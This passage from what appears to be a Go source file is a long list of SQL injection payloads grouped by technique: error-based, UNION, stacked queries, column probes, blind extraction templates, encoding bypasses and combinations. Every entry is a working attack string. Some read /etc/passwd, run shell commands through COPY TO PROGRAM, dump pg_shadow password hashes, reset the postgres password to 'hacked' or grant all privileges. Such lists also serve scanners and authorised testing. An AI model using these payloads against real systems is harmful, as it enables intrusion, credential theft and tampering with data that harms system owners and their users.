		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,2,COUNT(*),CONCAT((SELECT user()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a)--"},
		{Type: "error", Content: "' AND (SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)--"},
		{Type: "error", Content: "' AND (SELECT * FROM (SELECT 1)a JOIN (SELECT 1)b JOIN (SELECT 1)c JOIN (SELECT 1)d)--"},
		{Type: "error", Content: "' AND (SELECT * FROM (SELECT 1)x JOIN (SELECT 2)y JOIN (SELECT 3)z JOIN (SELECT 4)w)--"},
		{Type: "error", Content: "' AND (SELECT 1/0 FROM DUAL)--"},
		{Type: "error", Content: "' AND 1/0--"},
		{Type: "error", Content: "' AND 1=convert(int,(SELECT user()))--"},
		{Type: "error", Content: "' AND 1=convert(int,(SELECT db_name()))--"},
		{Type: "error", Content: "' AND 1=convert(int,(SELECT @@version))--"},
		{Type: "error", Content: "' AND 1=CAST((SELECT user()) AS int)--"},
		{Type: "error", Content: "' AND 1=CAST((SELECT db_name()) AS int)--"},
		{Type: "error", Content: "' AND 1=CAST((SELECT @@version) AS int)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM sys.tables WHERE 1=CAST((SELECT user_name()) AS int))--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM sys.tables WHERE 1=CAST((SELECT db_name()) AS int))--"},
		{Type: "error", Content: "' AND ORD(MID((SELECT database()),1,1))>1--"},
		{Type: "error", Content: "' AND ORD(MID((SELECT user()),1,1))>1--"},
		{Type: "error", Content: "' AND (ROW_NUMBER() OVER (ORDER BY 1))--"},
		{Type: "error", Content: "' AND COLUMNS_UPDATED()--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM sys.columns A, sys.columns B, sys.columns C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM sys.objects A, sys.objects B, sys.objects C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM sys.all_columns A, sys.all_columns B, sys.all_columns C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_attribute A, pg_attribute B, pg_attribute C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_class A, pg_class B, pg_class C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_type A, pg_type B, pg_type C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_proc A, pg_proc B, pg_proc C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_description A, pg_description B, pg_description C)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM pg_stat_all_tables A, pg_stat_all_tables B)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1 UNION SELECT 2) a, (SELECT 1 UNION SELECT 2) b, (SELECT 1 UNION SELECT 2) c)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) a, (SELECT 1 UNION SELECT 2 UNION SELECT 3) b)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1 UNION SELECT 2) a, (SELECT 1 UNION SELECT 2) b, (SELECT 1 UNION SELECT 2) c, (SELECT 1 UNION SELECT 2) d)--"},
		{Type: "error", Content: "' AND 1=ANY(SELECT 1/0)--"},
		{Type: "error", Content: "' AND 1=ALL(SELECT 1/0)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1 WHERE 1/0) a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1 FROM (SELECT 1 WHERE 1/0) a) b)--"},

		// ═════════════════════════════════════════════════════
		// UNION-BASED — ADVANCED VARIATIONS (60+)
		// ═════════════════════════════════════════════════════
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--"},
		{Type: "union", Content: "' UNION SELECT NULL--"},
		{Type: "union", Content: "' UNION ALL SELECT NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL--"},
		{Type: "union", Content: "' UNION ALL SELECT NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--"},
		{Type: "union", Content: "' UNION SELECT 1--"},
		{Type: "union", Content: "' UNION ALL SELECT 1--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3--"},
		{Type: "union", Content: "1' UNION ALL SELECT 1,2,3--"},
		{Type: "union", Content: "1' UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "1' UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--"},
		{Type: "union", Content: "1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--"},
		{Type: "union", Content: "\" UNION SELECT 1,2,3--"},
		{Type: "union", Content: "\" UNION ALL SELECT 1,2,3--"},
		{Type: "union", Content: "\" UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "\" UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "1\" UNION SELECT 1,2,3--"},
		{Type: "union", Content: "1\" UNION ALL SELECT 1,2,3--"},
		{Type: "union", Content: "1\" UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "1\" UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "') UNION SELECT 1,2,3,4--"},
		{Type: "union", Content: "') UNION ALL SELECT 1,2,3,4--"},
		{Type: "union", Content: "') UNION SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "') UNION ALL SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "')) UNION SELECT 1,2,3,4,5--"},
		{Type: "union", Content: "')) UNION ALL SELECT 1,2,3,4,5--"},
		{Type: "union", Content: "')) UNION SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "\") UNION SELECT 1,2,3,4--"},
		{Type: "union", Content: "\") UNION ALL SELECT 1,2,3,4--"},
		{Type: "union", Content: "\")) UNION SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "\")) UNION ALL SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION DISTINCT SELECT 1,2,3--"},
		{Type: "union", Content: "' UNION DISTINCT SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--"},
		{Type: "union", Content: "' UNION SELECT @@version,2,3--"},
		{Type: "union", Content: "' UNION ALL SELECT db_name(),2,3--"},
		{Type: "union", Content: "' UNION SELECT user,2,3 FROM mysql.user--"},
		{Type: "union", Content: "' UNION SELECT table_name,2,3 FROM information_schema.tables--"},
		{Type: "union", Content: "' UNION SELECT column_name,2,3 FROM information_schema.columns--"},
		{Type: "union", Content: "' UNION SELECT 1,table_name,column_name FROM information_schema.columns--"},
		{Type: "union", Content: "' UNION SELECT 1,@@version,@@hostname--"},
		{Type: "union", Content: "' UNION SELECT 1,database(),user()--"},
		{Type: "union", Content: "' UNION SELECT 1,current_user,current_database--"},

		// ═════════════════════════════════════════════════════
		// STACKED QUERIES — ADVANCED (50+)
		// ═════════════════════════════════════════════════════
		{Type: "stacked", Content: "'; DROP TABLE IF EXISTS _tmp; CREATE TABLE _tmp (id INT); INSERT INTO _tmp VALUES (1); SELECT * FROM _tmp;--"},
		{Type: "stacked", Content: "'; SELECT * FROM (SELECT 1) a;--"},
		{Type: "stacked", Content: "'; BEGIN TRANSACTION; SELECT 1; COMMIT;--"},
		{Type: "stacked", Content: "'; ROLLBACK;--"},
		{Type: "stacked", Content: "'; SELECT CURRENT_TIMESTAMP;--"},
		{Type: "stacked", Content: "'; SELECT DB_NAME();--"},
		{Type: "stacked", Content: "'; SELECT USER_NAME();--"},
		{Type: "stacked", Content: "'; SELECT @@SERVERNAME;--"},
		{Type: "stacked", Content: "'; EXEC sp_helpdb;--"},
		{Type: "stacked", Content: "'; EXEC sp_who;--"},
		{Type: "stacked", Content: "'; EXEC sp_who2;--"},
		{Type: "stacked", Content: "'; EXEC xp_logininfo;--"},
		{Type: "stacked", Content: "'; EXEC xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion';--"},
		{Type: "stacked", Content: "'; EXEC xp_subdirs 'C:\\';--"},
		{Type: "stacked", Content: "'; EXEC xp_dirtree 'C:\\';--"},
		{Type: "stacked", Content: "'; EXEC xp_fixeddrives;--"},
		{Type: "stacked", Content: "'; SELECT table_name FROM information_schema.tables;--"},
		{Type: "stacked", Content: "'; SELECT column_name FROM information_schema.columns;--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_catalog.pg_tables;--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_catalog.pg_tables WHERE schemaname='public';--"},
		{Type: "stacked", Content: "'; SELECT tablename FROM pg_catalog.pg_tables;--"},
		{Type: "stacked", Content: "'; SELECT column_name FROM information_schema.columns WHERE table_name='users';--"},
		{Type: "stacked", Content: "'; SELECT table_name FROM information_schema.tables WHERE table_schema='public';--"},
		{Type: "stacked", Content: "'; COPY (SELECT 1) TO '/tmp/test.txt';--"},
		{Type: "stacked", Content: "'; COPY (SELECT 1) TO PROGRAM 'whoami';--"},
		{Type: "stacked", Content: "'; SELECT lo_import('/etc/passwd');--"},
		{Type: "stacked", Content: "'; CREATE OR REPLACE FUNCTION test() RETURNS VOID AS $$ BEGIN RAISE NOTICE 'test'; END; $$ LANGUAGE plpgsql; SELECT test();--"},
		{Type: "stacked", Content: "'; SELECT dblink_exec('dbname=test','SELECT 1');--"},
		{Type: "stacked", Content: "'; SELECT * FROM dblink('dbname=test','SELECT 1') AS t(id INT);--"},
		{Type: "stacked", Content: "'; GRANT ALL ON ALL TABLES IN SCHEMA public TO public;--"},
		{Type: "stacked", Content: "'; CREATE EXTENSION IF NOT EXISTS dblink;--"},
		{Type: "stacked", Content: "'; CREATE EXTENSION IF NOT EXISTS pgcrypto;--"},
		{Type: "stacked", Content: "'; SELECT pg_read_file('/etc/passwd');--"},
		{Type: "stacked", Content: "'; SELECT pg_read_binary_file('/etc/passwd');--"},
		{Type: "stacked", Content: "'; SELECT pg_ls_dir('/tmp');--"},
		{Type: "stacked", Content: "'; SELECT pg_file_write('/tmp/test','hello',false);--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_stat_activity WHERE state='active';--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_roles;--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_shadow;--"},
		{Type: "stacked", Content: "'; SELECT rolname,rolsuper FROM pg_roles;--"},
		{Type: "stacked", Content: "'; ALTER USER postgres WITH PASSWORD 'hacked';--"},
		{Type: "stacked", Content: "'; UPDATE pg_authid SET rolpassword = 'hacked' WHERE rolname='postgres';--"},
		{Type: "stacked", Content: "'; SELECT * FROM v$version;--"},
		{Type: "stacked", Content: "'; SELECT * FROM v$instance;--"},
		{Type: "stacked", Content: "'; SELECT * FROM v$database;--"},
		{Type: "stacked", Content: "'; SELECT * FROM dba_users;--"},
		{Type: "stacked", Content: "'; SELECT * FROM dba_tables;--"},
		{Type: "stacked", Content: "'; SELECT * FROM dba_tab_columns;--"},
		{Type: "stacked", Content: "'; SELECT * FROM all_tables;--"},
		{Type: "stacked", Content: "'; SELECT * FROM all_objects WHERE owner='PUBLIC';--"},

		// ═════════════════════════════════════════════════════
		// ORDER BY / GROUP BY — PROBE VARIATIONS (40+)
		// ═════════════════════════════════════════════════════
		{Type: "orderBy", Content: "' ORDER BY 1-- "},
		{Type: "orderBy", Content: "' ORDER BY 2-- "},
		{Type: "orderBy", Content: "' ORDER BY 3-- "},
		{Type: "orderBy", Content: "' ORDER BY 4-- "},
		{Type: "orderBy", Content: "' ORDER BY 5-- "},
		{Type: "orderBy", Content: "' ORDER BY 6-- "},
		{Type: "orderBy", Content: "' ORDER BY 7-- "},
		{Type: "orderBy", Content: "' ORDER BY 8-- "},
		{Type: "orderBy", Content: "' ORDER BY 9-- "},
		{Type: "orderBy", Content: "' ORDER BY 10-- "},
		{Type: "orderBy", Content: "' ORDER BY 11-- "},
		{Type: "orderBy", Content: "' ORDER BY 12-- "},
		{Type: "orderBy", Content: "' ORDER BY 13-- "},
		{Type: "orderBy", Content: "' ORDER BY 14-- "},
		{Type: "orderBy", Content: "' ORDER BY 15-- "},
		{Type: "orderBy", Content: "' ORDER BY 16-- "},
		{Type: "orderBy", Content: "' ORDER BY 17-- "},
		{Type: "orderBy", Content: "' ORDER BY 18-- "},
		{Type: "orderBy", Content: "' ORDER BY 19-- "},
		{Type: "orderBy", Content: "' ORDER BY 20-- "},
		{Type: "orderBy", Content: "' ORDER BY 21-- "},
		{Type: "orderBy", Content: "' ORDER BY 22-- "},
		{Type: "orderBy", Content: "' ORDER BY 23-- "},
		{Type: "orderBy", Content: "' ORDER BY 24-- "},
		{Type: "orderBy", Content: "' ORDER BY 25-- "},
		{Type: "orderBy", Content: "' GROUP BY 1--"},
		{Type: "orderBy", Content: "' GROUP BY 2--"},
		{Type: "orderBy", Content: "' GROUP BY 3--"},
		{Type: "orderBy", Content: "' GROUP BY 4--"},
		{Type: "orderBy", Content: "' GROUP BY 5--"},
		{Type: "orderBy", Content: "' GROUP BY 6--"},
		{Type: "orderBy", Content: "' GROUP BY 7--"},
		{Type: "orderBy", Content: "' GROUP BY 8--"},
		{Type: "orderBy", Content: "' GROUP BY 9--"},
		{Type: "orderBy", Content: "' GROUP BY 10--"},
		{Type: "orderBy", Content: "' ORDER BY 1 ASC--"},
		{Type: "orderBy", Content: "' ORDER BY 1 DESC--"},
		{Type: "orderBy", Content: "' ORDER BY 1 NULLS FIRST--"},
		{Type: "orderBy", Content: "' ORDER BY 1 NULLS LAST--"},
		{Type: "orderBy", Content: "' HAVING 1=1--"},
		{Type: "orderBy", Content: "' HAVING 1=2--"},
		{Type: "orderBy", Content: "' GROUP BY 1,2--"},
		{Type: "orderBy", Content: "' GROUP BY 1,2,3--"},
		{Type: "orderBy", Content: "' GROUP BY 1,2,3,4,5--"},

		// ═════════════════════════════════════════════════════
		// DATA EXFILTRATION — BLIND EXTRACTION (50+)
		// ═════════════════════════════════════════════════════
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT database()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT user()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT version()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT @@datadir),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ORD(MID((SELECT database()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ORD(MID((SELECT user()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ORD(MID((SELECT version()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND (SELECT ASCII(SUBSTR((SELECT database()),%d,1)))>%d--"},
		{Type: "blind-extract", Content: "' AND UNICODE(SUBSTR((SELECT database()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns LIMIT 1 OFFSET 0),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND (SELECT ASCII(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0),%d,1)))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM master..sysdatabases WHERE dbid=1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=2),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=3),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=4),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=5),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM v$database),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM v$datafile),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT name FROM v$tablespace),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT username FROM dba_users WHERE rownum=1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT table_name FROM all_tables WHERE rownum=1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT column_name FROM all_tab_columns WHERE rownum=1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT current_user),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT current_database()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT current_schema),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT inet_server_addr()),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT current_query),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR(pg_read_file('/etc/hostname'),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT usename FROM pg_shadow WHERE usesysid=10),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT passwd FROM pg_shadow WHERE usename='postgres'),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT datname FROM pg_database WHERE datdba=10),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND IF(ASCII(SUBSTR((SELECT database()),%d,1))>%d,SLEEP(2),0)--"},
		{Type: "blind-extract", Content: "' AND IF(ASCII(SUBSTR((SELECT database()),%d,1))>%d,SLEEP(5),0)--"},
		{Type: "blind-extract", Content: "' AND CASE WHEN ASCII(SUBSTR((SELECT database()),%d,1))>%d THEN SLEEP(3) ELSE 0 END--"},
		{Type: "blind-extract", Content: "' AND CASE WHEN ASCII(SUBSTR((SELECT database()),%d,1))>%d THEN SLEEP(5) ELSE 0 END--"},
		{Type: "blind-extract", Content: "' AND (SELECT CASE WHEN ASCII(SUBSTR((SELECT database()),%d,1))>%d THEN pg_sleep(3) ELSE 0 END)--"},
		{Type: "blind-extract", Content: "' AND (SELECT CASE WHEN ASCII(SUBSTR((SELECT database()),%d,1))>%d THEN pg_sleep(5) ELSE 0 END)--"},
		{Type: "blind-extract", Content: "' AND (SELECT CASE WHEN ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=1),%d,1))>%d THEN 1 ELSE 0 END)=1--"},
		{Type: "blind-extract", Content: "' AND (SELECT CASE WHEN ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=2),%d,1))>%d THEN 1 ELSE 0 END)=1--"},
		{Type: "blind-extract", Content: "' AND (SELECT CASE WHEN ASCII(SUBSTR((SELECT name FROM sysdatabases WHERE dbid=3),%d,1))>%d THEN 1 ELSE 0 END)=1--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT DB_NAME(1)),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT DB_NAME(2)),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT DB_NAME(3)),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT DB_NAME(4)),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT DB_NAME(5)),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET 0),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET 1),%d,1))>%d--"},
		{Type: "blind-extract", Content: "' AND ASCII(SUBSTR((SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET 2),%d,1))>%d--"},

		// ═════════════════════════════════════════════════════
		// ENCODING / ESCAPING — SPECIAL CHARACTER VARIATIONS (50+)
		// ═════════════════════════════════════════════════════
		{Type: "encoding", Content: "'%20OR%201=1--"},
		{Type: "encoding", Content: "'%20AND%201=1--"},
		{Type: "encoding", Content: "'%20UNION%20SELECT%201,2--"},
		{Type: "encoding", Content: "'%20OR%201=1%20--%20"},
		{Type: "encoding", Content: "'%20AND%201=1%20--%20"},
		{Type: "encoding", Content: "'%2520OR%25201=1--"},
		{Type: "encoding", Content: "'%2520AND%25201=1--"},
		{Type: "encoding", Content: "'%2520UNION%2520SELECT%25201,2--"},
		{Type: "encoding", Content: "'%2520OR%25201=1%2520--%2520"},
		{Type: "encoding", Content: "'%2520AND%25201=1%2520--%2520"},
		{Type: "encoding", Content: "'%c0%a0OR%c0%a01=1--"},
		{Type: "encoding", Content: "'%c0%a0AND%c0%a01=1--"},
		{Type: "encoding", Content: "'%c0%a0UNION%c0%a0SELECT%c0%a01,2--"},
		{Type: "encoding", Content: "'%ef%bc%87OR%201=1--"},
		{Type: "encoding", Content: "'%ef%bc%87AND%201=1--"},
		{Type: "encoding", Content: "'%e2%80%aeOR%201=1--"},
		{Type: "encoding", Content: "'%e2%80%aeAND%201=1--"},
		{Type: "encoding", Content: "'%5cOR%201=1--"},
		{Type: "encoding", Content: "'%5cAND%201=1--"},
		{Type: "encoding", Content: "'%5c%27OR%201=1--"},
		{Type: "encoding", Content: "'%5c%27AND%201=1--"},
		{Type: "encoding", Content: "'+OR+1=1+--+"},
		{Type: "encoding", Content: "'+AND+1=1+--+"},
		{Type: "encoding", Content: "'+UNION+SELECT+1,2+--+"},
		{Type: "encoding", Content: "'UNION%20ALL%20SELECT%201,2--"},
		{Type: "encoding", Content: "'UNION%20DISTINCT%20SELECT%201,2--"},
		{Type: "encoding", Content: "'%31%27%20OR%201=1--"},
		{Type: "encoding", Content: "'%31%27%20AND%201=1--"},
		{Type: "encoding", Content: "'%31%27%20UNION%20SELECT%201,2--"},
		{Type: "encoding", Content: "'%66%6f%6d%20users%20--"},
		{Type: "encoding", Content: "'%66%72%6f%6d%20users%20--"},
		{Type: "encoding", Content: "'%57%48%45%52%45%201=1--"},
		{Type: "encoding", Content: "'s%e%l%e%c%t 1,2--"},
		{Type: "encoding", Content: "'s%65l%65%63t 1,2--"},
		{Type: "encoding", Content: "'u%6e%69%6fn s%65l%65ct 1,2--"},
		{Type: "encoding", Content: "'%75%6e%69%6f%6e %73%65%6c%65%63%74 1,2--"},
		{Type: "encoding", Content: "'\\u0075\\u006e\\u0069\\u006f\\u006e \\u0073\\u0065\\u006c\\u0065\\u0063\\u0074 1,2--"},
		{Type: "encoding", Content: "'\\x75\\x6e\\x69\\x6f\\x6e \\x73\\x65\\x6c\\x65\\x63\\x74 1,2--"},
		{Type: "encoding", Content: "'\\u0075ni\\u006f\\u006e \\u0073el\\u0065ct 1,2--"},
		{Type: "encoding", Content: "'OR 1=1--%c0%80"},
		{Type: "encoding", Content: "'AND 1=1--%c0%80"},
		{Type: "encoding", Content: "'OR 1=1--%bf%27"},
		{Type: "encoding", Content: "'AND 1=1--%bf%27"},
		{Type: "encoding", Content: "'OR 1=1%00--"},
		{Type: "encoding", Content: "'AND 1=1%00--"},
		{Type: "encoding", Content: "'OR%001=1--"},
		{Type: "encoding", Content: "'AND%001=1--"},
		{Type: "encoding", Content: "'UNION%00SELECT 1,2--"},
		{Type: "encoding", Content: "'UNION%20SELECT%201,2%00--"},

		// ═════════════════════════════════════════════════════
		// MULTI-PAYLOAD — COMBINATION INJECTIONS (70+)
		// ═════════════════════════════════════════════════════
		{Type: "multi", Content: "' OR 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' OR 1=1 UNION ALL SELECT 1,2,3--"},
		{Type: "multi", Content: "' OR 1=1 UNION SELECT NULL,NULL,NULL--"},
		{Type: "multi", Content: "' OR 1=2 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "\" OR 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' AND 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' AND 1=2 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' AND 1=1 UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "multi", Content: "' OR SLEEP(5) UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' OR SLEEP(10) UNION ALL SELECT 1,2,3--"},
		{Type: "multi", Content: "' OR 1=1 LIMIT 1--"},
		{Type: "multi", Content: "' OR 1=1 LIMIT 1 OFFSET 0--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3 INTO @a,@b,@c--"},
		{Type: "multi", Content: "' UNION ALL SELECT 1,2 INTO OUTFILE '/tmp/out.txt'--"},
		{Type: "multi", Content: "' UNION SELECT 1,2 INTO DUMPFILE '/tmp/out.txt'--"},
		{Type: "multi", Content: "' UNION SELECT @@version,@@hostname,@@datadir--"},
		{Type: "multi", Content: "' UNION ALL SELECT user(),database(),version()--"},
		{Type: "multi", Content: "' UNION SELECT current_user,current_database,current_schema--"},
		{Type: "multi", Content: "' UNION ALL SELECT name,type,value FROM v$parameter--"},
		{Type: "multi", Content: "' UNION SELECT banner,2,3 FROM v$version--"},
		{Type: "multi", Content: "' UNION ALL SELECT username,password,email FROM users--"},
		{Type: "multi", Content: "' UNION SELECT user,pass,uid FROM mysql.user--"},
		{Type: "multi", Content: "' UNION ALL SELECT name,password,uid FROM pg_shadow--"},
		{Type: "multi", Content: "' UNION SELECT logid,passwd FROM pwds--"},
		{Type: "multi", Content: "' AND 1=1 UNION SELECT table_name,NULL FROM information_schema.tables--"},
		{Type: "multi", Content: "' AND 1=2 UNION SELECT column_name,NULL FROM information_schema.columns--"},
		{Type: "multi", Content: "' OR 1=1 LIMIT 1,1--"},
		{Type: "multi", Content: "' OR 1=1 LIMIT 2,1--"},
		{Type: "multi", Content: "' OR 1=1 OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY--"},
		{Type: "multi", Content: "' OR 1=1 OFFSET 2 ROWS FETCH NEXT 1 ROWS ONLY--"},
		{Type: "multi", Content: "1' OR 1=1 LIMIT 1--"},
		{Type: "multi", Content: "1' OR 1=1 OFFSET 0 FETCH NEXT 1 ROW ONLY--"},
		{Type: "multi", Content: "' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b--"},
		{Type: "multi", Content: "' UNION ALL SELECT * FROM (SELECT 1,2,3)x--"},
		{Type: "multi", Content: "' UNION SELECT * FROM (SELECT 1 UNION SELECT 2) a--"},
		{Type: "multi", Content: "' OR 1=1 ORDER BY 1--"},
		{Type: "multi", Content: "' OR 1=1 ORDER BY 1 DESC--"},
		{Type: "multi", Content: "' OR 1=1 GROUP BY 1--"},
		{Type: "multi", Content: "\" OR 1=1 ORDER BY 1--"},
		{Type: "multi", Content: "' OR 1=1 HAVING 1=1--"},
		{Type: "multi", Content: "' OR 1=1 AND SLEEP(5)--"},
		{Type: "multi", Content: "' OR 1=1 AND pg_sleep(5)--"},
		{Type: "multi", Content: "' OR 1=1 WAITFOR DELAY '0:0:5'--"},
		{Type: "multi", Content: "' OR 1=1 AND DBMS_LOCK.SLEEP(5)--"},
		{Type: "multi", Content: "' OR 1=1 AND BENCHMARK(10000000,MD5(1))--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM DUAL--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3 FROM (SELECT 1,2,3) x--"},
